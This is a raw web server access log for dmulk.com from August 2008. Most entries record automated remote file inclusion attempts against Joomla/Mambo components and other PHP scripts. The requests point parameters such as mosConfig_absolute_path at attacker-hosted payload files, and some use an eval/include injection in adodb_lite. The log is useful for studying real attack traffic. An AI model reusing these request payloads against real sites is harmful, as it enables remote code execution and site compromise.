211.141.87.6 - - [21/Aug/2008:11:30:02 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9928 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:30:03 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:03 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:06 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:08 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:30:11 -0700] "GET /logs/access_080801.log/lostpasswd.php?env[include_prefix]=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:30:19 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:30:21 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:30:23 -0700] "GET /logs/access_080802.log//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:33 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:30:35 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:39 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:40 -0700] "GET /logs/access_080419.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:40 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:42 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9943 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:42 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:43 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.88.192.8 - - [21/Aug/2008:11:30:43 -0700] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.88.192.8 - - [21/Aug/2008:11:30:44 -0700] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:30:47 -0700] "GET /logs/access_080717.log//errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:30:47 -0700] "GET //errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:30:47 -0700] "GET /logs/access_080720.log//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:30:47 -0700] "GET /logs//errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:30:52 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9944 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:30:58 -0700] "GET /logs//index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:30:59 -0700] "GET //index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.16.207.46 - - [21/Aug/2008:11:31:01 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:31:02 -0700] "GET /logs/access_080804.log//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:31:09 -0700] "GET /logs/access_080515.log//errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:31:12 -0700] "GET /logs/access_080720.log//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:13 -0700] "GET /logs/access_080611.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:31:13 -0700] "GET /logs/access_080710.log//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:31:14 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:31:14 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:14 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 9911 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:15 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:15 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:15 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9941 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:17 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:17 -0700] "GET /logs/access_080611.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:18 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 9911 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:18 -0700] "GET /logs/access_080614.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:19 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:31:19 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:31:19 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:19 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:19 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:20 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:20 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:21 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:22 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.73.137.93 - - [21/Aug/2008:11:31:23 -0700] "GET /logs/access_080614.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:23 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:26 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:28 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:31:56 -0700] "GET /logs/access_080806.log//index/login.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:31:56 -0700] "GET //index/login.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.249.67.135 - - [21/Aug/2008:11:31:57 -0700] "GET /logs/access_080417.log HTTP/1.1" 200 1622977 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:31:58 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:31:58 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:32:00 -0700] "GET /components/com_mambowiki/MamboLogin.php?IP=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:32:01 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:32:16 -0700] "GET /logs/access_080812.log/layout/default/params.php?gConf[dir][layouts]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:32:16 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:32:30 -0700] "GET /logs/access_080307.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:32:30 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9942 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:32:32 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:32:56 -0700] "GET /components/com_mambowiki/MamboLogin.php?IP=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:04 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9942 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:33:16 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:33:16 -0700] "GET /logs//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:33:17 -0700] "GET //index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9884 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:33:32 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:34 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:36 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:39 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:41 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:42 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:43 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9944 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:44 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:47 -0700] "GET /phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:33:51 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9941 "-" "libwww-perl/5.808" "www.dmulk.com"
217.202.13.92 - - [21/Aug/2008:11:33:52 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.202.13.92 - - [21/Aug/2008:11:33:53 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:34:06 -0700] "GET /logs/access_080720.log//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:34:16 -0700] "GET /logs/access_080414.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:34:31 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9899 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:34:35 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:34:41 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9943 "-" "libwww-perl/5.808" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:34:45 -0700] "GET /logs/access_080720.log//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:34:47 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:34:56 -0700] "GET /logs/access_080211.log//error.php?page=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:35:01 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:35:01 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:35:04 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:35:08 -0700] "GET //error.php?page=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:35:14 -0700] "GET /logs//error.php?page=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:35:17 -0700] "GET /logs/access_080812.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:35:19 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:19 -0700] "GET / HTTP/1.1" 200 9813 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:20 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:20 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:20 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:20 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:20 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:21 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:21 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:21 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:21 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
